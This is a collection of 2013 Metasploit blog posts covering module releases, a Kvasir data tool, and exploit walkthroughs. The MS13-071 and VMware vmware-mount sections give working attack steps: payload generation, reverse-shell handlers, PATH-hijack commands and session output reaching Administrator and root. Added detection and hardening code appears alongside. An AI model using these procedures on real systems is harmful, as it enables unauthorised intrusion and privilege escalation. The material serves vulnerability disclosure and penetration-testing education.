Hashtag Contest!

We're also kicking off a Twitter hashtag-based contest for some sweet Metasploit T-shirts (because we seriously have a huge pile of these since our last design contest), and a pair of stylish (read: bright orange) Beats By Dre noise-cancelling headphones, perfect for use with Metasploit's microphone spying modules. You can read up on the details over on the Infosec Community blog post, by Rapid7 community manager Patrick Hellen.

 

New Modules

Including the two discussed above, we've got nine new modules this week, all of them exploits.

 

Exploit modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Recently we've added an exploit for MS13-071 to Metasploit. Rated as "Important" by Microsoft, this remote code execution vulnerability, found by Eduardo Prado, affects Windows XP and Windows 2003 environments and is triggered by the handling of specially crafted themes. In this blog post we would like to discuss the vulnerability and give some helpful tips for exploiting it from Metasploit.

 

First of all, the bug occurs while handling the [boot] section on .theme files, where an arbitrary path can be used as screen saver:

 

 


 

Since SCR files are just Windows executables, the vulnerability can be exploited by placing a malicious EXE on a shared folder, and distributing a malicious .theme referencing the remote screen saver, for example "SCRNSAVE.EXE=\\host\share\exploit.scr". When the victim opens the .theme and visits the Screen Saver tab, the payload will be executed:

 


 

The code execution is also triggered if the victim installs the malicious theme and stays away from the computer, when Windows tries to display the screensaver.

 

In order to solve it, the Microsoft patch adds a new function, EnsureInfoxScreenSaver(), which tries to verify the screen saver path:

 


 

With the vulnerability analyzed, writing a file format exploit and running it isn't hard if you take two things into account:

 

  • There is a malicious .theme file which the victim must open.
  • There is a payload embedded into an EXE, disguised as an .scr, which must be distributed through a shared folder.
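A detection check for the trigger described above, as an added example that is not from the original post or from the Metasploit module: it reads a .theme file's [boot] section and flags a SCRNSAVE.EXE value that is a UNC path (or any path outside the system directory). The sample theme text and the 192.0.2.10 host are constructed.

```c
/* Added example (not from the original post): scan .theme text for the
 * MS13-071 trigger, a [boot] SCRNSAVE.EXE entry pointing at a remote share. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

enum theme_verdict {
    THEME_NO_SCREENSAVER = 0,   /* no SCRNSAVE.EXE key inside [boot] */
    THEME_LOCAL_SYSTEM   = 1,   /* screen saver lives under the system directory */
    THEME_REMOTE_UNC     = 2,   /* \\host\share\...: the pattern from the post */
    THEME_OTHER_PATH     = 3    /* local but outside system32: review manually */
};

/* Case-insensitive prefix match against a string literal. */
#define PREFIX_MATCH(v, p) (strncasecmp((v), (p), sizeof(p) - 1) == 0)

/* Strip leading/trailing blanks and CR in place; returns the trimmed start. */
static char *trim(char *s) {
    while (isspace((unsigned char)*s)) s++;
    char *end = s + strlen(s);
    while (end > s && isspace((unsigned char)end[-1])) *--end = '\0';
    return s;
}

/* Classify a single SCRNSAVE.EXE value. */
enum theme_verdict classify_screensaver(const char *value) {
    if (strncmp(value, "\\\\", 2) == 0) return THEME_REMOTE_UNC;
    if (PREFIX_MATCH(value, "%SystemRoot%\\system32\\")) return THEME_LOCAL_SYSTEM;
    if (PREFIX_MATCH(value, "C:\\Windows\\system32\\")) return THEME_LOCAL_SYSTEM;
    return THEME_OTHER_PATH;
}

/* Walk the INI-style text line by line.  Only SCRNSAVE.EXE inside [boot]
 * matters; the same key in any other section is ignored.  The value found
 * is copied into found (n bytes) so a caller can report it. */
enum theme_verdict check_theme_text(const char *text, char *found, size_t n) {
    char line[512];
    int in_boot = 0;
    const char *p = text;
    found[0] = '\0';
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        p = nl ? nl + 1 : p + len;
        char *l = trim(line);
        if (*l == '[') {                         /* section header */
            in_boot = strncasecmp(l, "[boot]", 6) == 0;
            continue;
        }
        if (!in_boot || *l == ';' || *l == '\0') continue;
        char *eq = strchr(l, '=');
        if (!eq) continue;
        *eq = '\0';
        if (strcasecmp(trim(l), "SCRNSAVE.EXE") == 0) {
            char *val = trim(eq + 1);
            snprintf(found, n, "%s", val);
            return classify_screensaver(val);    /* first occurrence decides */
        }
    }
    return THEME_NO_SCREENSAVER;
}

/* Constructed sample inputs, modelled on the post's SCRNSAVE.EXE example. */
static const char SAMPLE_MALICIOUS[] =
    "[Theme]\r\nDisplayName=Totally Legit\r\n\r\n"
    "[boot]\r\nSCRNSAVE.EXE=\\\\192.0.2.10\\share\\exploit.scr\r\n";
static const char SAMPLE_BENIGN[] =
    "[Theme]\r\nDisplayName=Bubbles\r\n"
    "[boot]\r\nSCRNSAVE.EXE=%SystemRoot%\\system32\\Bubbles.scr\r\n";

int main(void) {
    char found[256];
    enum theme_verdict v = check_theme_text(SAMPLE_MALICIOUS, found, sizeof found);
    printf("malicious sample: verdict %d, SCRNSAVE.EXE=%s\n", (int)v, found);
    v = check_theme_text(SAMPLE_BENIGN, found, sizeof found);
    printf("benign sample:    verdict %d, SCRNSAVE.EXE=%s\n", (int)v, found);
    return 0;
}
```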

 

That said, let's see how to use the current Metasploit module, which supports two modes of operation:

 

  • Use an external shared resource (Samba Server or Windows shared folder) to deploy the malicious screen saver. In this case:


1) Configure the UNCPATH option:

 

msf exploit(ms13_071_theme) > set UNCPATH \\\\192.168.172.243\\exploit\\exploit.scr
UNCPATH => \\192.168.172.243\exploit\exploit.scr
msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Remember to share the malicious EXE payload as \\192.168.172.243\exploit\exploit.scr
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme

 

2) Deploy the payload, embedded into an exe, on the UNCPATH location:

 

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.172.1 LPORT=4444 X > /tmp/exploit.scr

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

Length: 290

Options: {"LHOST"=>"192.168.172.1", "LPORT"=>"4444"}

 

3) Finally run a handler for the payload, distribute the malicious .theme file (generated on 1) ) and wait for sessions:

 

msf exploit(ms13_071_theme) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.172.203
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.203:1668) at 2013-09-18 13:57:25 -0500

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

 

 

  • Use the SMBServer support embedded in the module. In this case, just configure the SRVHOST option to listen on an address reachable by the victims, and let the embedded SMBServer mixin do the work. Distribute the .theme file and wait for the sessions:

 

msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.172.1\JalVNbsrN\sCOmK.scr
[*] Server started.
msf exploit(ms13_071_theme) > [*] Sending stage (752128 bytes) to 192.168.172.203
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.203:1637) at 2013-09-18 13:31:27 -0500

msf exploit(ms13_071_theme) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit

 

The SMBServer mixin needs (root) privileges to bind to port 445/TCP. It will also fail if the port is busy (common on Windows environments or Samba servers). Since the code overriding the SMBServer mixin is brand new, I'd love to hear from you if it worked for you. Remember it has been tested only on Windows XP SP3 and Windows 2003 SP2 - the current targets for this exploit.

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Data management is half the battle for penetration testing, especially when you're auditing large networks. As a penetration tester with Cisco's Advanced Services, I've created a new open source tool called Kvasir that integrates with Metasploit Pro, Nexpose, and a bunch of other tools I use regularly to aggregate and manage the data I need. In this blog post, I'd like to give you a quick intro to what Kvasir does - and to invite you to use it with Metasploit Pro.

 

Cisco’s Advanced Services has been performing penetration tests for our customers since the acquisition of the Wheel Group in 1998. We call them Security Posture Assessments or SPA for short, and I’ve been pen testing for just about as long. During our typical assessments we may analyze anywhere between 2,000 and 10,000 hosts for vulnerabilities, perform various exploitation methods such as account enumeration and password attempts, buffer/stack overflows, administrative bypasses and others. We then have to collect and document our results within the one or two weeks we are on-site and prepare a report.

 

How can anyone keep track of all this data, let alone work together as a team? Are you sure you really found the holy grail of customer data and adequately documented it? What if you're writing the report but you weren't the one who did the exploit?

 

The answer is to build a data management application that works for you. The first iterations the SPA team created were a mixture of shell, awk, sed, tcl, perl, expect, python and whatever else engineers felt comfortable programming in. If you remember the Cisco Secure Scanner product (aka NetSonar) then our early tools were this with extra goodies.

 

Welcome to the 21st Century

As time moved on, our tools became unfriendly to larger data sets, inter-team collaboration became awkward, and supporting new data types was difficult. The number of issues detected by vulnerability scanners started to increase, and while we have always been able to support very large environments, the edges were starting to bulge.

 

We don’t believe this scenario is unique to us. We also don’t believe current publicly available solutions really help. Most teams we’ve talked with have used a variant of issue tracking software (TRAC, Redmine) or just let Metasploit Pro handle everything.

 

We think this isn’t good enough which is why we are releasing our tool, Kvasir, as open source for you to analyze, integrate, update, or ignore. We like the tool a lot and we think it fills a missing key part of penetration testing. It’s not perfect but it’s grown up a lot and will improve.

 

What’s Kvasir?

Kvasir is a web-based application with its goal to assist “at-a-glance” penetration testing. Disparate information sources such as vulnerability scanners, exploitation frameworks, and other tools are homogenized into a unified database structure. This allows security testers to accurately view the data and make good decisions on the next attack steps.

 

Multiple testers can work together on the same data allowing them to share important collected information. There’s nothing worse than seeing an account name pass by and finding out your co-worker cracked it two days ago but didn’t find anything “important” so it was never fully documented.

 

Supported Data Sources

As of the current release, Kvasir directly supports the following tools:

  • Rapid7 Nexpose Vulnerability Scanner
  • Rapid7 Metasploit Pro (limited support for Express/Framework data)
  • Nmap Security Scanner
  • ShodanHQ
  • THC-Hydra
  • Foofus Medusa
  • John The Ripper
  • …and more!

 

Nexpose and Metasploit Pro Integration

Since the SPA team generally uses Rapid7's Nexpose and Metasploit Pro, Kvasir integrates with these tools via API. We purposefully did not incorporate some features but may have future plans for others.

 

The importation of Nexpose site reports is fully automated. Just pick a site and let Kvasir generate the XML report, download and parse it! After parsing, the scan file can be imported into a Metasploit Pro instance.

 

For Metasploit Pro results you must first generate an XML report but after that is done Kvasir will download and parse it automatically. Kvasir also supports the db_creds output and will automatically import pwdump and screenshots through the Metasploit Pro API.

 

Metasploit Pro’s automatic Bruteforce and Exploit features can be called directly from Kvasir. Just select your list of target IP Addresses and go!

 

From Vulnerability to Exploit

So you have a host with a list of vulnerabilities, but what is exploitable? Metasploit Pro as well as other exploit frameworks and databases are mapped to vulnerability and CVE entries granting the user an immediate view of potential exploitation methods.

 

Screenshots!

The initial screen of Kvasir shows two bar graphs detailing the distribution of vulnerabilities based on severity level count and host/severity count as well as additional statistical data:

 


 

A tag-cloud based on high-level severities (level 8 and above) is included which may help pinpoint the highest risk vulnerabilities. This is based solely on vulnerability count.

 

Kvasir’s Host Listing page displays details such as services, vulnerability counts, operating systems, assigned groups and engineers:

 


 

 

Kvasir supports importing exploit data from Nexpose (Exploit Database and Metasploit) and other tools. Links from vulnerabilities and CVE assignments to exploits are made so you can get an immediate glance at what hosts/services have exploitable vulnerabilities.

 


 

The host detail page provides an immediate overview of valuable information such as services, vulnerability mapping, user accounts, and notes, all shared between testing engineers:

 


 

Of course as you collect user accounts and passwords it’s nice to be able to correlate them to hosts, services, hashes and hash types, and sources.

 


 

Where can I get more info?

For more information, see my post on Kvasir on the Cisco blog. You can also get the Kvasir source code on GitHub. Fork, Install, Review, Contribute!

todb

Weekly Update

Posted by todb Employee Sep 18, 2013

Windows Meterpreter: Reloaded

If you've been around Metasploit for any length of time, you know that Meterpreter is the preferred and de facto standard for manipulating a target computer after exploit. While Meterpreter and Metasploit go hand-in-hand, we did manage to get some code separation between the two by breaking Windows Meterpreter out to its own open source repository on GitHub.

 

As threatened in a previous blog post, we've got some fresh eyeballs looking at that codebase. One of the major hassles with maintaining and improving Meterpreter has been its finicky build requirements. Well, that's been pretty much totally solved; thanks to the valiant efforts by OJ Reeves, building Meterpreter from source locally is as simple as a) ensuring you have the documented build dependencies, then running 'make.' Yep, good old trusty 'make.' That's it!

 

Getting a sane and understandable build environment is but the first step for getting a stable, testable- and buildable-by-anyone Meterpreter out there, and has already resolved a bug or two that's been bothering us forever. For example, thanks to this refresh, OJ was able to spot and fix a problem with 64-bit pointer truncation that was wanging up process migration under certain circumstances.

 

So, if you're of the Windows C++ developer persuasion, and have a favorite bug in Meterpreter, please check out the new environment. I promise, you won't end up clawing your eyes out over build errors and warnings. If you do, please, a) get to a hospital, and then, b) file a bug. If you just care about having fresh binaries to use on your engagement, the shipping code has been compiled for you and is already hanging out in your Metasploit distribution of choice.

 

Gemfile updates

If you're running a packaged build, you won't notice anything about the recent refresh of a pile of Ruby gem dependencies; the installers and updaters all take care of these things for you. However, if you're running Metasploit straight from a git repo (either ours or some fork of Rapid7's), you'll want to run either 'bundle install' to get a quick refresh, or update with 'msfupdate' (which takes care of these things for you).

 

These gem updates are not particularly exciting, but I know that when people update and see the warning about missing Ruby gems, they occasionally freak out and think that everything's broken. Don't fret. All you need to do is get your gems refreshed and you'll be back in the exploitation business in just a minute.

 

New Modules

We've got ten new modules this week -- seven exploits, three auxiliary modules. Of particular interest are the two new exploits targeting the Sophos Web Appliance. If you're relying on this gear to help protect your internal user base from evilness on the Web, you will definitely want to update to the latest patched version. It can be pretty career-limiting when your enterprise gets owned via a vulnerability in security software.

 

Exploit modules

 

Auxiliary modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Exploiting Internet Explorer (MS13-055)

 

This week, we open with a new IE exploit. This is a pretty recent patch (from July, 2013), and more notably, it appears it was silently patched without attribution to the original discoverer, Orange Tsai. So, if you're a desktop IT admin, you will certainly want to get your users revved up to the latest patch level. Thanks tons to Peter WTFuzz Vreugdenhil and of course Wei sinn3r Chen for knocking this exploit out.

 

While the silent patch killed Orange's 0-day a week before he was scheduled to present it at Hitcon, this does seem to imply that the folks at Microsoft are getting better and better at running their own fuzzers at Internet Explorer. That's ultimately Good News for the Internet, and demonstrates that software vendors continue to take post-development security seriously.

 

That said, let's take a look at the other end of the spectrum...

 

GE Proficy Directory Traversal (ICSA-13-022-02)

Also this week, we have a new module from our own Juan Vazquez, exploiting a bug found in something called GE Proficy Cimplicity. For details, see the link below. With it, unauthenticated users can snag pretty much any file off of the target (Windows-based) machine, which of course includes sensitive files.

 

I bring this module up in particular because this GE Proficy is used in SCADA applications, which, if you've been paying attention, means that there is a huge, untapped attack surface there. Take this bug for example; it's a straight directory traversal. No need for fancy encodings, tricky filter evasions, or anything like that; just ../../../../ your way up to the goods on the machine running this web server.

 

I know, pretty leet.

 

I don't want to knock GE too hard on this, of course, since this is pretty much the state of affairs with any class of security bug you care to name when it comes to SCADA and embedded devices. Working on auditing these applications is like stepping back into the 20th Century while being armed with fancy, free exploit toolkits from the 21st.

 

I've worked on some disclosure material with ICS-CERT, which is the clearinghouse for these kinds of vulnerabilities, and I know those guys are plenty capable and know what they're doing. I just feel like we see this kind of thing in SCADA-land over, and over, and over again, so I kind of feel like we're getting something wrong, as a security industry, when it comes to educating these hardware vendors on how to conduct themselves when releasing software. What can we do better? How can we impart the last 10 years of secure coding know-how to the people that are providing critical infrastructure? I'm hopeful that if Metasploit modules attacking this stuff get out there in the public, it'll be a wake-up call. Is there a better way?

 

Space Conflicts

It was as if a million tabs cried out in terror, and were suddenly silenced. As threatened in last week's blog post, we pulled the trigger on retabbing two big chunks of Metasploit, the /lib and /modules directories. If you're a Metasploit contributor, and you notice that your recent or upcoming pull request is suddenly in a conflicted state, this is almost certainly why. Dealing with it is pretty straightforward -- please see http://r-7.co/MSF-TABS for some instructions on how to unconflict your shiny new patches and feature additions.

 

Note, this won't interfere at all with entirely new modules (which is why not all of the outstanding PRs were conflicted), but even so, you should get used to normal two-space tabs for your Metasploit programming. In the meantime, now is a fine time to rebase your own fork of the rapid7/metasploit-framework master branch against ours. On normal ISP speeds, this should take but a moment, even though it's more than a half-million lines of change. Aren't you glad we ditched SVN last year?

 

New Modules

We've got five new modules this week, two exploits, two auxiliary modules, and one post.

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Meterpreter Updates

This is a big week for Meterpreter. For starters, we've landed a new Meterpreter Python payload. Yes, yes, I know, you thought that Metasploit was all Ruby all the time, but this and the Python payloads for bind shells from Spencer McIntyre should help out on advancing the state of Meterpreter by leaps and bounds. Despite Metasploit's massive Ruby footprint, most security developers know Python well enough to scratch their own penetration testing itches in it, so I'm looking forward to a lot of active development here. Plus, since Python is part of the Linux Standard Base, you're quite likely to find it on pretty much any normal Linux distribution, so it should see a lot of use for non-Microsoft targets.

 

In other Meterpreter news, we have a new contributor entering the fray on the Windows 32-bit and 64-bit side by the name of OJ Reeves. His entire mission in life (at least, for now) is to make it much easier for normal humans to compile, test, and extend Meterpreter for Windows platform. If you've been down this hacking Meterpreter path in the past, you know what kind of pit vipers can be lurking in that code, so expect to see some massive improvements there in the next couple weeks.

 

VMWare Setuid Exploit (CVE-2013-1662)

This week also sees a new local privilege exploit targeting Linux, the VMWare Setuid vmware-mount Unsafe popen(3) module (aka, vmware-mount.rb). Discovered by Google's Tavis Ormandy and implemented by our own James Egypt Lee, this exploits a setuid vulnerability that takes advantage of a VMWare installation to sneak a root shell. Egypt discusses the Metasploit implementation at length in this blog post, so I encourage you to check it out. Note that this module does not enable attackers to escape from the VMWare guest to the host operating system; it's specifically useful for taking advantage of a VMWare installation to elevate privileges on the host OS itself.

 

More OSX Hijinks

The other set of modules I want to highlight is a trio from Rapid7's Joe Vennix: the OSX Capture Userspace Keylogger module, the OSX Manage Record Microphone module, and the OSX Manage Webcam module. As you can probably guess by their titles, these are all post-exploit modules penetration testers can exercise to extend their eyes and ears into the site under test. These kinds of Hollywood-hacker style post-exploit tricks are exactly the kind of thing that's great to demo to clients to help explain the true risk associated with Apple desktop / laptop bugs, since they are, by their nature, pretty dramatic and fun to use.

 

Tab Assassin @Tabassassin

 

Finally, this week, we're going to be pulling the trigger on the great retabbing of Metasploit in order to bring us up to the normal, regular coding standards common to Ruby projects. While I have every expectation this change will be traumatic for long-time contributors, we're faithfully documenting everything along the way under the shortlink http://r-7.co/MSF-TABS. If you have patches and pull requests that are suddenly thrown into a conflicted state this week, the retabbing from @Tabassassin (pictured right) is probably the root cause. But never fear, just read the fine material regarding the change, and you should be back into an unconflicted state in two shakes.

 

New Modules

We've got eleven new modules this week. Including the ones mentioned above, we've got another three ZDI-derived exploits (which are always informative), a really nicely commented implementation of the MS13-059 exploit for Internet Explorer, and a pair of Windows post modules that can be used to further extend control over the victim machine. As always, thanks everyone for your contributions!

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

On August 22, Tavis Ormandy dropped a bug in VMWare that takes advantage of a build configuration in Linux distributions. Providing you have user-level access to a Debian or Ubuntu box with VMWare installed, this exploit gives you root access. It's a fun bug and I want to explain how the Metasploit module for it works:

 

The background

There's this thing called priv_mode in bash that means it will drop privs if euid != uid. Anyone who has ever tried to "chmod +s /bin/sh" will recognize this as a minor frustration that is easily circumvented by simply writing a wrapper in C that does something like:

#define _GNU_SOURCE   /* setresuid(2) is a GNU/Linux extension */
#include <unistd.h>

int main(int argc, char **argv) {
  setresuid(0, 0, 0);                    /* make uid match euid so bash's priv_mode has nothing to drop */
  execl("/bin/sh", "sh", (char *)NULL);  /* execl(3) takes an argv list terminated by a NULL pointer */
  return 0;
}


 

That is not the thing that priv_mode is meant to fix (although it is annoying if you don't know what's happening when it appears that your privilege escalation bug is getting you an unprivileged shell). What it is really effective at stopping is the case of a setuid binary calling system(3) or popen(3) before dropping privs. It turns out that VMWare Workstation and Player ship with a binary called vmware-mount that does exactly this.
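The hardened counterpart of that pattern, as an added example that is not from the original post, from Metasploit, or from VMware: a setuid helper that needs to run an external tool (here lsb_release, the name the exploit abuses) fixes PATH, insists on an absolute program path, and drops privileges before calling popen(3), so a binary planted in the caller's current directory is never found and would not run as root anyway. The function names and SAFE_PATH value are this example's own choices.

```c
/* Added example (not from the original post or from VMware): the safe way for
 * a setuid helper to run an external command.  vmware-mount's mistake, as the
 * post explains, was calling popen(3) while still privileged and under the
 * caller's PATH, so "lsb_release" in "." ran as root. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Trusted search path for /bin/sh -c; never inherit PATH from the caller. */
#define SAFE_PATH "/usr/bin:/bin"

/* Replace the inherited environment with a minimal, known one. */
void sanitize_environment(void) {
    clearenv();                    /* glibc: drop everything the caller passed in */
    setenv("PATH", SAFE_PATH, 1);
    setenv("IFS", " \t\n", 1);
}

/* Permanently give up elevated privileges: real, effective and saved ids all
 * become the caller's.  Returns 0 on success, -1 if the drop did not happen. */
int drop_privileges(void) {
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (setresgid(gid, gid, gid) != 0) return -1;   /* group first, while still root */
    if (setresuid(uid, uid, uid) != 0) return -1;
    if (geteuid() != uid || getegid() != gid) return -1;  /* verify, never assume */
    return 0;
}

/* Run a helper given by ABSOLUTE path with no privileges and a clean
 * environment; copies its first output line (newline stripped) into out
 * (n bytes).  Returns 0 on success, -1 on a relative name or any failure. */
int run_unprivileged_helper(const char *abs_cmd, char *out, size_t n) {
    if (abs_cmd == NULL || abs_cmd[0] != '/' || n == 0) return -1;  /* no PATH lookups */
    sanitize_environment();
    if (drop_privileges() != 0) return -1;
    FILE *fp = popen(abs_cmd, "r");     /* runs as the real user, under SAFE_PATH */
    if (fp == NULL) return -1;
    if (fgets(out, (int)n, fp) == NULL) out[0] = '\0';
    out[strcspn(out, "\n")] = '\0';
    return pclose(fp) == 0 ? 0 : -1;
}

int main(void) {
    char line[128];
    /* Absolute path, clean environment, privileges already dropped. */
    if (run_unprivileged_helper("/usr/bin/lsb_release -ds", line, sizeof line) == 0)
        printf("release: %s\n", line);
    else
        printf("lsb_release not available or failed (euid=%u)\n", (unsigned)geteuid());
    return 0;
}
```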

 

The steps for achieving privilege escalation are pretty straight forward:

  1. Create an executable to be used as our payload
  2. Write it to the host OS's filesystem (in this case, we have to call it lsb_release)
  3. Mark it executable
  4. Run the vulnerable setuid binary

 

The exploit

This exploit will drop our payload as an executable, so first we include the Msf::Exploit::EXE mixin, which will give us access to several convenience methods for creating executables.

include Msf::Exploit::EXE

 

Then, in the exploit method, we create an ELF file with generate_payload_exe. This method is smart enough to build the right kind of executable for whatever platform and architecture is supported by the module and currently selected. Then we just write the file and execute the vulnerable utility with the current directory added to the path. These three lines are basically the meat of the exploit.

write_file("lsb_release", generate_payload_exe)
cmd_exec("chmod +x lsb_release")
cmd_exec("PATH=.:$PATH vmware-mount")

 

When our shell runs, it will block the controlling process. In our case, that would cause the existing shell session to hang, which is pretty impolite. To solve that problem, we prepend some shellcode to the generated binary that just forks and exits the parent process, leaving our payload to happily frolic about in the background.

 

The money shot

15:09:57 0 1 exploit(vmware_mount) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(egypt) gid=1000(egypt) groups=1000(egypt),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)
^Z
Background session 1? [y/N]  y

15:09:05 0 1 exploit(vmware_mount) > show options

Module options (exploit/linux/local/vmware_mount):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.99.1     yes       The listen address
   LPORT  1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


15:09:10 0 1 exploit(vmware_mount) > run

[*] Started reverse handler on 0.0.0.0:1234
[*] Max line length is 65537
[*] Writing 175 bytes in 1 chunks of 529 bytes (octal-encoded), using printf
[*] Sending stage (36 bytes) to 192.168.99.1
[*] Command shell session 2 opened (192.168.99.1:1234 -> 192.168.99.1:41671) at 2013-09-04 15:08:16 -0500

id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare),1000(egypt)

Want to give this a try yourself?

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

Sudo password bypass on OSX

This week's update includes a nifty local exploit for OSX, the sudo bug described in CVE-2013-1775. We don't have nearly enough of these Apple desktop exploits, and it's always useful to disabuse the Apple-based cool-kids web app developer crowd of the notion that their computing platform of choice is bulletproof.

Joe Vennix, the principal author of this module, is, in fact, of that very same Apple-based developer crowd, and usually busies himself cranking out features for Metasploit Pro. But, he's been hanging out with the wrong crowd -- the exploit devs here at Rapid7 -- so over the weekend, he put together this implementation of Todd C. Miller's and Marco Schoepl's sudo time-changing bug. Turns out, OSX allows regular users to adjust the system time. This, in turn, creates the opportunity to escalate the privileges of a compromised user account to root without having to know that user's password, assuming the victim user has used sudo at least once before (which is often the case for local OSX users).

Pretty neat trick. For more details on why this works, see the oss-sec post from early this year. Thanks Joe!
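For readers who want the "why" in code form, here is an added Ruby example (mine, not part of the post or the module) that models sudo's credential-cache check in simplified form. Assumptions, labelled in the comments: sudo -k stamps the ticket file with the epoch, a ticket is fresh when its mtime is within timestamp_timeout of the wall clock, and the patched sudo refuses to treat an epoch-stamped ticket as fresh. Clock values and ticket times are constructed Unix seconds.

```ruby
# Added example (not from the original post or the module): simplified model of
# sudo's ticket check, showing why a user who can rewind the clock gets a stale
# ticket accepted, what the patched check does, and a sudoers setting that
# removes the cache entirely. Assumed simplifications are noted inline.

EPOCH = 0               # assumption: "sudo -k" stamps the ticket with the epoch
DEFAULT_TIMEOUT = 5 * 60 # sudoers timestamp_timeout default, in seconds

# Pre-fix logic (simplified model): the ticket is fresh if its mtime is within
# the timeout window of "now" and not implausibly far in the future.
def ticket_valid_vulnerable?(ticket_mtime, now, timeout = DEFAULT_TIMEOUT)
  return false if timeout <= 0                        # caching disabled
  ticket_mtime <= now + 2 * timeout && now - ticket_mtime < timeout
end

# Patched logic (assumed): a ticket sitting at the epoch came from "sudo -k" and
# is never considered fresh, no matter what the wall clock says.
def ticket_valid_fixed?(ticket_mtime, now, timeout = DEFAULT_TIMEOUT)
  return false if ticket_mtime == EPOCH
  ticket_valid_vulnerable?(ticket_mtime, now, timeout)
end

# Scenario from the post: the user has run sudo before and the ticket was later
# reset to the epoch; an unprivileged user then rewinds the clock to 1970.
def attack_scenario(checker)
  ticket        = EPOCH
  clock_now     = 1_378_324_096   # constructed "real" time, September 2013
  clock_rewound = EPOCH + 30      # 30 s after Jan 1 1970
  {
    real_clock:    checker.call(ticket, clock_now),
    rewound_clock: checker.call(ticket, clock_rewound),
  }
end

# Mitigation that works even on an unpatched sudo: "Defaults timestamp_timeout=0"
# in sudoers disables credential caching, so there is no ticket to reuse.
def with_timeout_zero(checker)
  checker.call(EPOCH, EPOCH + 30, 0)
end

if __FILE__ == $0
  p attack_scenario(method(:ticket_valid_vulnerable?))  # rewound_clock: true
  p attack_scenario(method(:ticket_valid_fixed?))       # rewound_clock: false
end
```

Two defensive takeaways fall out of the model: the clock is part of sudo's trust base, so letting unprivileged users set it is itself a privilege grant, and a short or zero timestamp_timeout shrinks or removes the window regardless of the sudo version.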

Housekeeping!

